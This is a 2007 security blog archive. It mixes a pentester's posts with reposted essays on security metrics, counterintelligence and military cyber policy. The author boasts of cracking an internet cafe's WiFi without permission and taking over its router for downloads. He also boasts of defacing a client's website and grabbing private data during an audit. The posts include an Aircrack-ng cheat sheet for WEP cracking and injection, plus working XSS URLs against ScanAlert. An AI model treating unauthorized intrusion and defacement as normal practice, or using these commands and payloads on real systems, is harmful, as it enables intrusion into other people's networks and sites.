Rabu, 31 Oktober 2007

Paypal CRMgateway XSS

Paypal used to suffer from a lot from phishing attacks in the past and i bet even today, the bad guys are finding ways to exploit this hole to get more money. I was again playing around and i managed to find a XSS hole in paypal's crmgateway. Well, it seems like paypal never learn their lesson in the past and still allows for injections. Anyway, i had already cancelled my account with paypal because of their bad service and unforgivable mistake they made. Good luck paypal.



The Hacka Man

A Plea to the Worthies

You may have seen stories like Cybersecurity Experts Collaborate with subtitles like A think tank has tapped several heavyweight security experts to staff a commission that will advise the president. That story continues:

The Center for Strategic and International Studies (CSIS) wants the commission to come up with a list of recommendations that the new president who takes office in January 2009 "can pick up and run with right away," said James Lewis, director of the CSIS Technology and Public Policy Program. The commission, made up of 32 cybersecurity experts, plans to finish its work by the end of 2008. I am fairly confident that nothing of value will come from this group, but there is one task which could completely reverse my opinion. Rather than wasting time on recommendations that will probably be ignored, how about taking a step in a direction that will have real impact: security metrics. That's right. Spend the first day (or two, if you are a slow reader or can't sit still for long periods) reading Andy Jaquith's book. Next, and this is the crucial part:

Figure out how to play and score the game before you pretend to think you can improve the score.

What does this mean? Just a few ideas include:

  • Propose definitions for security, risk, threat, vulnerability, inside threat, external threat, and all the other words we use yet upon which we never agree. Hold hearings and invite real security people (not just digital security people) to express their views.

  • Propose some metrics and see how other operations define success. Hold hearings on the results of that process.

  • Apply metrics to some real organizations and gain a baseline set of numbers. Repeat the process at determined time intervals. Try to identify correlations and if possible causations. Be anonymous if necessary, but use a real methodology and not the self-selection applied by CSI/FBI and others.


Do you see where I am going here? At the end of the process we could have a framework for seeing just what is happening. I defy anyone to tell me just how bad or good our digital security situation is right now. Some say the sky is falling, others say we're happy! happy!, others say we're just as secure as we need to be to continue limping along. It is a proper role for a panel of worthies to help figure out how the game is played and then what the score is. It is a waste of time to make recommendations before those basic steps have been taken.

Hacking and Cracking Wireless

One day after intruding into the router, i remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands and it comes in very handy when doing a wireless audit and save you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel


NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel
iwocnfig ath0 channel n
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up

use macchanger instead

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9
===================
D-Lnk DWL G122

aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure they are on same channel using (channel hopping does not work on D-Link DWL G122???)
iwlist channel (to find out the current channel set)

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================



########################################################




PACKET CAPTURE:

airodump-ng device (find out first the interested bssid and channel)

Then capture packets on that particular channel:

airodump-ng --channel --bssid -w dumpfile device(ath0/rausb0

Notes: capture full packets when using PTW attack (don't dump ivs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools



############################################################

ATTACKS

You may want to associate to ap first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association:
ireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0




ARP replay (for wep cracking PTW method):
if RXQ in airodump window is > 90 then #/s = 200+ (watch for #Data, it contains IV)

aireplay-ng --arpreplay -b -h device

Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)



#############################################################
WEP CRACKING

Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)

aircrack-ng -z -b dumpfile*.cap
40-bit = 20,000
104-bit = 40,000

Normal Attack
-n 64 (test if 40-bin WEP) remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.


#######################################################

Increasing injection Speed

iwconfig device rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man

Hacked into a Wireless Router.

These days, i am just mad crazy. Hacking, hacking and still hacking. Basically i am dead boring and decide to see how far can i go with my hacking skills. Today, after finishing auditing a customer, i wanted to check my email as i need to send out an urgent email. I saw an internet cafe with Wifi connection, however there was encryption on. Within a few minutes, i managed to crack their password and hacked straight into their router. With that, i managed to use bit torrent to do port forwarding and download my favourite tv show. Well, it wasn't as thrilling as the first time i hacked into a wireless router, but still, it was a hack. How i do it? Just by observation and some trial and error and there you go.



The Hacka Man

Selasa, 30 Oktober 2007

Web Application Security with Joe Walker

This is a great slideshare from Joe Walker with all the new hacking techniques that involves with ajax and Web2.0. Its content is simple yet very entertaining and easily understandable. Check it out guys,



http://getahead.org/blog/joe/

The Hacka Man

Free Audit, Is it Real??

Ok, i am providing free audits for those who need my help in assisting them to secure their applications or networks and read properly, i am NOT charging a single cent for my effort of work in helping you. The reason for doing so is because i am giving back to the community that once helped me in getting where i am today. I remembered i was hacking like nobody business back in the days with trojans, port scanning, exploits, etc..I was very young then and indeed very enthusiastic in all sorts of hacking. Today, because of the busy work schedule and commitments i have, i tend to have lesser time in reading or researching. However, i am still pretty much involved in the security community when in comes to networking and web applications. There are actually quite a number of people who approached me for free auditing of their public facing web applications and i actually managed test their site and show them what i had found. Of course, i cannot reveal any of those clients i did before, but trust me, some of them are huge organization and of course some are my friends.

To get a free audit, i need the following details:

1. Prove that you are the owner of the site or network.

2. Personal details of yourself.

3. If you are from a company, use your company's email to send me an email and follow up with a call to my mobile.

4. If you are an individual, i would require you to give me a call to my mobile or skype. Send me an email first at hackathology@gmail.com

5. If there should be any meetup, prepare a Non Diclosure Agreement for signing if required and discuss for the Scope Of Work.

I cannot guarantee i have the time to test and deliver on time for each and every customer if the request traffic is high, however, i will do my best to deliver you of what i promised. Also, if the scope gets larger, then the amount of delay will be longer, it all depends. Don't forget i have a day time job and doing a favour for you. Lastly, should there be any changes based on the audit details, i will update it here on my blog.

The Hacka Man

Senin, 29 Oktober 2007

Wake Up Corporate America

I am constantly hammered for downplaying the "inside threat" and focusing on external attackers. Several months ago I noted the Month of Owned Corporations as an example of enterprises demonstrating security failures exploited by outsiders. Thanks to Bots Rise in the Enterprise, it appears the external threat is finally getting more attention:

Who says bots are just for home PCs? Turns out bot infections in the enterprise may be more widespread than originally thought.

Botnet operators traditionally have recruited "soft" targets -- home users with little or no security -- and the assumption was that the more heavily fortressed enterprise was mostly immune. But incident response teams and security researchers on the front lines say they are witnessing significant bot activity in enterprises as well...

Rick Wesson, CEO of Support Intelligence, says the rate of botnet infection in the enterprise isn't necessarily increasing -- it just hasn't been explored in detail until recently. "What's changing is the perception. It's been underestimated, underreported, and underanalyzed," Wesson says. "Corporate America is in as bad shape as a user at home."

Wesson says his firm, which does security monitoring, instantly finds dozens of bot-infected client machines in an enterprise customer's network when it starts studying its traffic. "We find dozens of bot-compromised systems off the bat. The longer we stay in [there], the more we find."
(emphasis added)

Wake up, corporate America (and the world). When you open your eyes you're not going to like what you see, but dealing with the truth is better than pretending everything's ok.

Detecting BroadVision Applications. Are they secure?

Are proprietary applications secure? Well, i guess yes and no. Security researchers are constantly researching for flaws in those applications and only if a bug is reported, will only then the company take actions to secure their loopholes. I am currently auditing a BroadVision application and what a surprised i got from my results. I am not supposed to reveal anything, but i let me tell you, for a critical application like this, i am not sure if the customer is using an old version of BroadVision or it was simply not check for sanitization. I could basically do pretty much i want from that application and create a havoc. Too bad, i cant show anything here but trust me, if you guys got a chance to audit a BroadVision application, you will be surprised with the kind of flaws you find. Its basically like opening a can of worms, waiting for someone to feed on it.

Well, at first i wasn't sure it was a BroadVision application, however after some researching on observation on the HTTP headers, this is what i got:

POST http://example.com/bvsn/bvcom/en/server/whereto.jsp?BV_SessionID=NNNN1809204881.10923774158NNNN&BV_EngineID=nnndaoplghjkiihcfklcfkmdgohdgih.0&BV_UseBVCookie=yes HTTP/1.0

The killer signature here is the parameter names of BV_SessionID and BV_ EngineID. If you see these anywhere in a URL or on a http header, you have more or less nailed down a BroadVision Application. Of course there are some other parameters like checking for .do extention, however that wasn't seen during the audit. Google for those highlighted in bold and you will see what i mean. I am now signing off here and back for another round of audit. I am going to pretty much cripple the whole application this time round.

The Hacka Man

Injection Vectors, Are you up for it?

Recently, i had been doing a lot of web penetration test and i realised that most of them suffers from injection flaws. Well, some can be deadly and some were just pretty minor. Well, it doesnt matter whether how severe the injection point is, if your site can be injected, it means that there are still some sanatizing and input validation work which still need to be followed up. Whenever i perform a penetration test on huge organization, scanners are always deemed useless and i have to do it manually with some form of checks i have on a list. Well, i managed to download a list of injection vectors from my friend Andres and that certainly helped me save time on googling for attack vectors. For those who do web penetration test, this will be very useful which will save your hours and hours looking, reading or searching around for information.

****************Start of the injection list*********************************















*****************************END*****************************************************

The Hacka Man

Sabtu, 27 Oktober 2007

An Important Lesson, Passive Enumeration with Paterva

I am about to assigned to a very exciting project and one of the most important elements of hacking is passive enumeration. I mean to bring down an organization or their networks, passive enumeration is definitely a must! This weekend i was scouring around for effective tools that would allow me to perform my search much faster and in a more logical and graphical manner and i happen to stumble on a site called Paterva. This is a wonderful toy for passive enumeration. You can basically search for a person, DNSName, Website, Email, etc and it will return you with results of what a person had visited, the sites he visted, the words he used, etc. Of course instead of searching for a person, you can also perform searches for organization. I know people are going to say that this can also be done in google dorking. Well, thats absolutely true, google dorking is so much powerful with more explosive results. However, not everyone is an expert in that area and i mean this is only the surface of passive enumeration. To excel deeper, you would of course require certain skills like google dorking to do so. I am pretty much happy with Paterva because of its simplicity and the ability to produce results in a more systematic manner. Try it for yourself.

http://maltego1.paterva.com/maltego-classic.html

http://www.paterva.com/web/Maltego



The Hacka Man

Kamis, 25 Oktober 2007

Citrix Hacking

Few weeks ago, pdp released an article about citrix hacking and it actually caught my attention. I read through a total of 4 pdp's posts and also wirepair's whitepaper on hackingcitrix. It was overall a basic yet interesting article and actually gave me an idea on how to start enumeration and hacking citrix. Well, for my next trick when i am about to audit citrix soon, i will start employing the techniques that was discussed in the article and also include one of my favourite tricks of all time that would actually find flaws in the Citrix application. This would actually test how robust is the citrix application and how can it handle certain payloads. Since Citrix is not taking security seriously according to wirepair's article, i would not hestitate to publish any flaws i find. With that being said, of course i would give them a chance to see how is their response.

The Hacka Man

Rabu, 24 Oktober 2007

Checkpwd 2.00 A12 released

Alexander Kornbrust of red database security just released the much anticipated checkpwd oracle cracking tool. This release has much improvement over the previous releases. Some of those include:

* support for Oracle 11g passwords
* support for APEX passwords (1.4-3.0.1)
* collect passwords from the database
* collect password candidates from the database
* option not to display the oracle password in command line
* crack passwords from the password history
* crack role passwords
* save checkpwd default configuration in a configuration file
* read username and password hashes from a file

Well, personally i had tried the version 1.21 months ago and it wasn't bad after all. And now comes version 2? You bet, it will be so much interesting to test out the new features and see how the tool produce the results. Weeks ago, THC, a german underground hacking community released oracle 11g password cracker and i must admit that i haven't tried it yet, but now Alex had incorporated checkpwd 2.00 with oracle database 11g password cracking abilities.

For those who don't know, Alex is a world renowned oracle security expert. He is constantly reporting oracle bugs to Oracle and had published a lot of whitepapers and giving talks at conferences regarding oracle security. I had met him once in Dubai and i must say he is a humble and patient person with amazing oracle security knowledge. To find out more, check him out at the following links

http://www.red-database-security.com

http://blog.red-database-security.com

The Hacka Man

Are You Secure? Prove It.

Are you secure? Prove it. These five words form the core of my recent thinking on the digital security scene. Let me expand "secure" to mean the definition I provided in my first book: Security is the process of maintaining an acceptable level of perceived risk. I defined risk as the probability of suffering harm or loss. You could expand my five word question into are you operating a process that maintains an acceptable level of perceived risk?

Let's review some of the answers you might hear to this question. I'll give an opinion regarding the utility of the answer as well.

For the purpose of this exercise let's assume it is possible to answer "yes" to this question. In other words, we just don't answer "no." We could all make arguments as to why it's impossible to be secure, but does that really mean there is no acceptable level of perceived risk in which you could operate? I doubt it.

So, are you secure? Prove it.

  1. Yes. Then, crickets (i.e., silence for you non-imaginative folks.) This is completely unacceptable. The failure to provide any kind of proof is security by belief. We want security by fact.

  2. Yes, we have product X, Y, Z, etc. deployed. This is better, but it's another expression of belief and not fact. The only fact here is that technologies can be abused, subverted, and broken. Technologies can be simultaneously effective against one attack model and completely worthless against another.

  3. Yes, we are compliant with regulation X. Regulatory compliance is usually a check-box paperwork exercise whose controls lag attack models of the day by one to five years, if not more. A compliant enterprise is like feeling an ocean liner is secure because it left dry dock with life boats and jackets. If regulatory compliance is more than a paperwork self-survey, we approach the realm of real of evidence. However, I have not seen any compliance assessments which measure anything of operational relevance.

  4. Yes, we have logs indicating we prevented attacks X, Y, and Z. This is getting close to the right answer, but it's still inadequate. For the first time we have some real evidence (logs) but these will probably not provide the whole picture. Sure, logs indicate what was stopped, but what about activities that were allowed? Were they all normal, or were some malicious but unrecognized by the preventative mechanism?

  5. Yes, we do not have any indications that our systems are acting outside their expected usage patterns. Some would call this rationale the definition of security. Whether or not this answer is acceptable depends on the nature of the indications. If you have no indications because you are not monitoring anything, then this excuse is hollow. If you have no indications and you comprehensively track the state of an asset, then we are making real progress. That leads to the penultimate answer, which is very close to ideal.

  6. Yes, we do not have any indications that our systems are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and memory-based evidence for signs of violations. This is really close to the correct answer. The absence of indications of intrusion is only significant if you have some assurance that you've properly instrumented and understood the asset. You must have trustworthy monitoring systems in order to trust that an asset is "secure." If this is really close, why isn't it correct?

  7. Yes, we do not have any indications that our systems are acting outside their expected usage patterns, and we thoroughly collect, analyze, and escalate a variety of network-, host-, and memory-based evidence for signs of violations. We regularly test our detection and response people, processes, and tools against external adversary simulations that match or exceed the capabilities and intentions of the parties attacking our enterprise (i.e., the threat). Here you see the reason why number 6 was insufficient. If you assumed that number 6 was ok, you forgot to ensure that your operations were up to the task of detecting and responding to intrusions. Periodically you must benchmark your perceived effectiveness against a neutral third party in an operational exercise (a "red team" event). A final assumption inherent in all seven answers is that you know the assets you are trying to secure, which is no mean feat.


Incidentally, this post explains why deploying a so-called IPS does nothing for ensuring "security." Of course, you can demonstrate that it blocked attacks X, Y, and Z. But, how can you be sure it didn't miss something?

If you want to spend the least amount of money to take the biggest step towards Magnificent Number 7, you should implement Network Security Monitoring.

Microsoft, Explain Threats to Microsoft

The Microsoft Malware Protection Center recently published their third Security Intelligence Report. The front page of the report says

An in-depth perspective on software vulnerabilities and exploits, malicious code threats, and potentially unwanted software, focusing on the first half of 2007

Inside it continues:

This report provides an in-depth perspective on software vulnerabilities (both in Microsoft software and third-party software), software exploits (for which there is a related MSRC bulletin), malicious software, and potentially unwanted software. The lists below summarize the key points from each section of the report...

The number of disclosures of new software vulnerabilities across the industry continues to be in the thousands...


Contrast that proper use of the word vulnerabilities in those excerpts with the incorrect use of the word threat in the quotes I noted in Someone Please Explain Threats to Microsoft:

As you go about filling in the threat model threat list, it’s important to consider the consequences of entering threats and mitigations. While it can be easy to find threats, it is important to realize that all threats have real-world consequences for the development team...

When we’re threat modeling, we should ensure that we’ve identified as many of the potential threats as possible (even if you think they’re trivial). At a minimum, the threats we list that we chose to ignore will remain in the document to provide guidance for the future.


In that excerpt, all uses of the word threat should be replaced with the word vulnerability, with possible exception of the term "threat modeling." In reality it should be "attack modeling," but in all other cases Microsoft is clearly talking about discovering holes/flaws/problems in their software, i.e., vulnerabilities.

So, it seems that the people who have the big security picture -- those who write the Microsoft Security Intelligence Reports -- know the difference between a threat and a vulnerability. The developers who focus on Microsoft's software -- those exercising the Microsoft Security Development Lifecycle -- are using "threat" when they should be saying "vulnerability."

It would be good for the SIR people to talk to the SDLC people. Without that coordination Microsoft's developers will continue to view the security problem incorrectly, and by extension, so will the customers who look to Microsoft for intellectual guidance.

On a related note, I was happy to see the latest SIR available as a .pdf.

FreeBSD 7.0 Developments

I am happy to announce that progress is being made towards the release of FreeBSD 7.0. This announcement says the release cycles for FreeBSD 7.0 and 6.3 have begun. The first 7.0-BETA1 .iso's you might want to test on a fresh system have been published. The announcement says "Instructions on using FreeBSD Update to perform a binary upgrade from FreeBSD 6.x to 7.0-BETA1 will be provided via the freebsd-stable list when available."

The FreeBSD 7.0 release schedule is available, and it shows FreeBSD 7.0 is scheduled for publication on 17 Dec 07. I would love to see this happen, but it's likely to take place about a month later. However, given the time between now and December, it's possible 7.0 will arrive by the end of the year. It looks like the todo list is rather small.

While researching this story I found Bruce Mah's FreeBSD Release Documentation Snapshot Page. A large amount of documentation for each release is published there.

When available I will probably use 7.0 in production. I had no problem with 6.0 in production. This is a departure from the experience of 5.0 and 5.1. I didn't transition from the 4.x line in production until 5.2.1 was released.

Minggu, 21 Oktober 2007

Counterintelligence and the Cyber Threat

Friday I attended an open symposium hosted by the Office of the National Counterintelligence Executive (ONCIX). It was titled Counterintelligence and the Cyber Threat and featured speakers and panels from government, law enforcement, industry, legal, and academic organizations. I attended as a representative of my company because our CSO, Frank Taylor, participated in the industry panel.

If you're not familiar with the term counterintelligence, let me reproduce a section from the OCNIX Web site:

Counterintelligence is the business of identifying and dealing with foreign intelligence threats to the United States. Its core concern is the intelligence services of foreign states and similar organizations of non-state actors, such as transnational terrorist groups. Counterintelligence has both a defensive mission — protecting the nation's secrets and assets against foreign intelligence penetration — and an offensive mission — finding out what foreign intelligence organizations are planning to better defeat their aims.

I also recommend reading the National Counterintelligence Strategy of the United States, 2007 (.pdf) which states:

Our adversaries -- foreign intelligence services, terrorists, foreign criminal enterprises and cyber intruders -- use overt, covert, and clandestine activities to exploit and undermine US national security interests. Counterintelligence is one of several instruments of national power that can thwart such activities, but its effectiveness depends in many respects on coordination with other elements of government and with the private sector.

During the Cold War, our nation's adversaries gained access to vital secrets of the most closely guarded institutions of our national security establishment and penetrated virtually all organizations of the US intelligence and defense communities. The resulting losses produced grave damage to our national security in terms of secrets compromised, intelligence sources degraded, and loves lost, and would have been catastrophic had we been at war.
(emphasis added)

Minor note 1: if we were not at war during the "Cold War," then why is it called a "War"? I believe the people who died fighting would call it a war.

Minor note 2: foreign intelligence services, terrorists, and foreign criminal enterprises are all specific parties. "Cyber intruders" are more often one of those previous parties. Those who perform digital attacks but do not fall into one of those three categories are usually script kiddies or recreational hackers, and should not be explicitly mentioned as counterintelligence targets. My guess is the report considers cyber-instantiated threats to be serious enough to somehow mention explicitly, but not enough intellectual rigor was applied to this sentence (like the Cold War section).

Major note: does the section about penetrating virtually all organizations of the US intelligence and defense communities surprise you? When I attended Air Force intelligence school in 1996-1997, one of our first instructors said:

"Most, if not all of the classified material you will see in your career has already been compromised. However, we have to act as if it's not."

I remembered thinking "What?!?" With hindsight, the more I hear about spies found inside government agencies, the more I understand that statement.

I found the symposium fascinating, so I'd like to share a few thoughts. Dr. Joel Brenner, the National Counterintelligence Executive, provided plenty of noteworthy comments. He said that counterintelligence is not security.

  • A security person sees a hole in a fence and wants to patch it.

  • A CI person sees a hole in a fence and wants to understand who created it, how it is being abused, and if it can be turned into an asset to use against the adversary.


Dr. Brenner said about 140 foreign intelligence surveillance organizations currently target the United States. Three strategic issues are at play:

  1. Threats to sovereign (US) networks, especially in the cyber domain. Dr. Brenner said There is growing acceptance that we face a cyber counterintelligence problem, not a security problem. I agree with this, and will have more to say about it in a future blog entry. He stressed the alteration attack (rather than the disclosure or destrucion attacks) as being the major problem facing US networks.

  2. Acquisition risk, i.e., supply chain risks. Dr. Brenner said we need technically literate lawyers and policymakers to address these risks.

  3. Collaboration, or the lack thereof. Dr. Brenner notes that out current "cooperation model" is a function of our "classification model," resulting in an antiquated system that serves no one well.


One of the most interesting comments was this:

Industry talks risk management but they really do risk acceptance, not risk mitigation.

How true that is!

Chris Inglis, Deputy Director of the NSA and a fellow USAFA grad, used a term I liked with regard to fighting the cyber adversary. He said we need to outmaneuver the adversary, not solve security problems. I love this because it implies "security" can't be "solved," and it provides a reason to review maneuver warfare as a way to counter the adversary.

John McClurg, Vice President for security at Honeywell, described his "validated data" approach to obtaining business buy-in for security initiatives. He collects data to support a security program and presents it to managers as a means to justify his work. This sounds a lot like showing evidence that a business unit is owned or about to be owned. I like this idea and my work with NSM would help provide such data.

Scott O’Neal, Chief Computer Intrusion Section, Cyber Division, FBI, said The adversary is clearly ahead of security. This is a fact we have to accept. This echoes statements I made earlier this year and at other times. The FBI addresses intrusions through three points of view: CT (counterterrorism), CI (counterintelligence) and criminal.

I'll have more to say on this subject in the months ahead.

Results from Hacking a huge organization

The other night i was auditing one of the customers here in Singapore. It was a huge organization with massive workforce and manpower. Normally huge organization tend to give people an impression that they must be secure because either they have enough internal people to do the patching or they must be doing some kind of upgrading work every now and then to have their servers or networks compliance with the government authority.

The results from my audit depicted that life isn't a bed of roses. Multiple servers suffers from DoS, buffer overflows and one of them even allows me to escalate to admin priveleges. Well, the results were really astonishing from such a reputable organization and everything was under my control. Of course, i managed to capture all screenshots of what i did and wrote a report to the management. I am wondering what they will do about it. They could either pray hard that no one attack them and start patching or expect for the worst where they could be brought down anytime anyday.

One of the coolest thing i did during the audit was defacement of their website. Personally, i had never deface a website before till that day. It was great seeing big organization websites having your own selected message or picture, definitely tarnishing their reputation and the feeling was just too estatic. Of course, i had to wrap it up fast by taking a screenshot of it and resume their site back to normal or i will be screwed. The one last thing i observed and found out was they were using a very old Operating System where most of their crucial data was residing. It was exhilarating as i was poking my way to grab all their private data. All in all, it was just bad, really bad. I am about to finish the report and i send it to the customer. I just want to see what is the response going to be.

The Hacka Man

Sabtu, 20 Oktober 2007

Russian Business Network

This week Brian Krebs of Security Fix wrote Shadowy Russian Firm Seen as Conduit for Cybercrime, Taking on the Russian Business Network, Mapping the Russian Business Network, and The Russian Business Network Responds. These are great articles, that, at the very least, bring a true threat to a wider audience. This Slashdot post featured a helpful thread providing some technical details on the network itself. If you would like to try identifying some of the networks involved, my post Routing Enumeration might be helpful. Searches via RIPE could also be illuminating.

While researching this post I found a few other incredible resources. First, there's a blog -- rbnexploit.blogspot.com -- that started last month. It's exclusively about RBN. Second, I found Nicholas Albright's blog, which covers botnets. Third, there's an absolutely amazing series of articles by Scott Berinato. They are lengthy but definitely worth reading.

Jumat, 19 Oktober 2007

Short update on audit

For those of you guys who are waiting for the result of the audit, because of the things i found and the sheer volume of report writing i am doing, i will only update the findings next week when i finish the report. Sorry for the wait, but thanks for the understanding.

The Hacka Man

Kamis, 18 Oktober 2007

e... singapore, re-evaluate your website!

Well, i am roughly around 10 mins before i start audit, but anyway, i would love to talk about e... singapore. Heard quite a few bad things about e... singapore and i remembered while i was at Dubai, i was asking them for a job, but in the end, they void my application. Back in Singapore, my colleagues were just talking about security companies in Singapore and they mentioned e.... I have no grudges against e..., but frankly speaking, as a MSS and now trying to expand their business into the IS field, i am issuing a challenge against them. By just browsing their websites, i am pretty sure that they can be Own3d! From my guess, they could be easily using IIS 5 or 6 and for this i can be sure by just testing one of their functions, without scanning their website. As for owning them, i pretty sure they tightened up most of the holes, EXCEPT for one. All in all, if they want to step into the the IS field, the first step would be to tighten their own holes first, or else how could they convince people that they are doing IS when they own site is at risk????? e..., get your internal auditors to re-evaluate the e... website or get me at NO cost to help you do the job.

The Hacka Man

ScanAlert, Hacker Safe?


Yesterday, i heard from my colleagues that we would be joining forces with ScanAlert and i was really puzzled with the move. I was asking myself that if ScanAlert is really Hacker Safe? Are they really that good with their scanners? Did they use open source scanners and customized it to their own? Are those clients they have really safe from hackers? Can i say that if i use ScanAlert service to scan my website or network, i will be safe from hackers? There are a lot of questions in my head and i think ScanAlert has a good way of doing marketing. They make every customer insert their logo onto their own site which provide more visibility of ScanAlert's Service. Well, it is a good from a company point of view because they are recognized and make money out of it, however, that doesnt mean that by using their service, i will be free from attackers. Not long ago, i remember members of sla.ckers.org posted XSS vulnerabilities on their site. So can i say that if i can find XSS on their site, their scanners are shitty and they are still hackers safe? I don't know, just my 2 cents worth. Anyway, i managed to digg out the XSS vector that was injected at their site sometime ago, however, they already patched it.

https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

The Hacka Man

Rabu, 17 Oktober 2007

Review of LAN Switch Security Posted

Amazon.com just posted my three star review of LAN Switch Security: What Hackers Know About Your Switches. From the review:

I really looked forward to reading LAN Switch Security (LSS), simply because it covered layer 2 issues. These days application security, rootkits, and similar topics get all the press, but the foundation of the network is still critical. Unfortunately, LSS disappointed me enough to warrant this three star review. I'm afraid those before me who wrote five star reviews 1) don't read enough other books or 2) don't set their expectations high enough.

The bottom line is that if you want to read a good Cisco security book, the best available is still Hacking Exposed: Cisco Networks.

Senin, 15 Oktober 2007

CSI Annual 2007 Contest

I've been given a press pass to attend CSI 2007 in Washington, DC, 3-9 November 2007. In exchange for posting the following, I've also got a $100 discount for anyone using the code CSI2007.

CSI Annual Conference 2007
November 3-9, 2007
Hyatt Regency Crystal City
Arlington, Virginia
www.CSIAnnual.com

CSI 2007, held November 3-9 in Arlington, VA, delivers a business-focused overview of enterprise security. 2,000+ delegates, 80 exhibitors and features 100+ sessions/seminars convene to provide a roadmap for integrating policies and procedures with new tools and techniques.

Register now using code: CSI2007 and save $100 off the conference or get a Free Exhibition Pass at www.csiannual.com.


If you think it's not worth $100 to my readers to see the previous text, how about this: I have two free full conference passes (together worth over $3000), courtesy of CSI, to be awarded to blog readers.

How do I decide who should get them? I'm going to hold an essay contest. The two best essays (judged by me) that address any of the following categories will win:

  • Discuss why control-compliant approaches to security like FISMA are a disaster.

  • Explain why detection systems should be kept separate from policy enforcement systems; see Considering Convergence? for background.

  • Tell us how Network Security Monitoring helped you perform your detection and response mission for a real incident. (You can anonymize your employer or organization.)

  • Any of the other "hot button" topics you've read at this blog.


Please send an email to taosecurity [at] gmail [dot] com with your answer, or publish it at your blog. Winning entries will be published on this blog.

Entries for the contest must be received by me via email no later than 8 pm eastern time Tuesday 23 October 2007.

Thank you to CSI for providing these free passes and discounts.

Jumat, 12 Oktober 2007

Air Force Cyberspace Report

This week I attended Victory in Cyberspace, an event held at the National Press Club. It centered on the release of a report written by Dr. Rebecca Grant for the Air Force Association's Eaker Institute. The report is titled Victory in Cyberspace (.pdf). The panel (pictured at left) included Lt. Gen. Robert J. Elder, Lt Gen. (ret) John R. Baker, and Gen. (ret) John P. Jumper. Dr. Grant is seated at the far right.

As far as the event went, I found it interesting. If you are exceptionally motivated you can download the entire 90 min briefing in .wmv format here. I'd like to share a few thoughts.

First, I was impressed by all the speakers. Lt. Gen. Baker led AIA when I was a Captain there. At the same time Gen. Jumper led Air Combat Command, before becoming Chief of Staff. I learned Lt. Gen. Elder has a PhD in engineering.

Lt. Gen. Elder commented that cyberspace is a domain similar to the ocean, and he specifically drew parallels with the Navy. (This made me wonder why the Navy isn't taking the lead on defending cyberspace.) In order to use the ocean for commercial purposes, the domain must be controlled so ships are protected from harm. Cyberspace is similar, except that in addition to requiring control of the domain in order to use it, the domain must first be created. (No one needs to create an ocean.)

Control, however, does not mean "ownership." Elder specifically stated the Air Force does not plan to "own cyberspace;" cyberspace is more of a "strategic commons" like the ocean. Cyberspace is also not confined only to the Internet. A presentation by Dr. Lani Kass titled Cyberspace: A Warfighting Domain cites the classified National Military Strategy for Cyberspace Operations to define cyberspace as:

a domain characterized by the use of electronics and the electromagnetic spectrum store, modify and exchange data via networked systems and associated physical infrastructures.

(Speaking of the NMSCO, I read a Joint document is en route, according to Joint Staff readies cyber operations plan.)

Elder's presentation featured plenty of military jargon, like the great "OODA loop" (observe, orient, decide, act) and a new "effects chain" (find, fix, target, engage). (That sounds like the OODA loop, doesn't it?)

One of Elder's major points, reflected in the report, is the Air Force's recognition that cyberspace (broadly meaning communications, I believe) is the foundation for all Air Force operations. I would argue that all of the services are equally dependent on cyberspace. That reminds me of the role of United States Transportation Command. It makes sense to me that cyberspace activities are currently part of United States Strategic Command.

USSTRATCOM accomplishes its cyber mission through the Joint Task Force - Global Network Operations (JTF-GNO, led by the commander of Defense Information Systems Agency), Joint Functional Component Command - Network Warfare (JFCC-NW, led by the director of National Security Agency), and Joint Information Operations Warfare Command (JIOWC, led by the commander of Air Force Intelligence, Surveillance, and Reconnaissance Agency).

If cyberspace is truly a warfighting domain (alongside land, sea, aerospace), I don't see who can argue against an independent Cyber Force. (I don't argue for a separate Space Force because I think the Air Force will eventually be the Aerospace Force.) Elder rejects the idea of an individual Cyber Force in Dr. Grant's report, but the Army had the same feeling about the Air Corps before 1947. We can separate the world into physical and virtual, or as the military likes to say, "kinetic" and "non-kinetic." I find it hard to believe that a cyber operator who reads and manipulates hex is going to find much in common with someone who kills people by exploding ordnance.

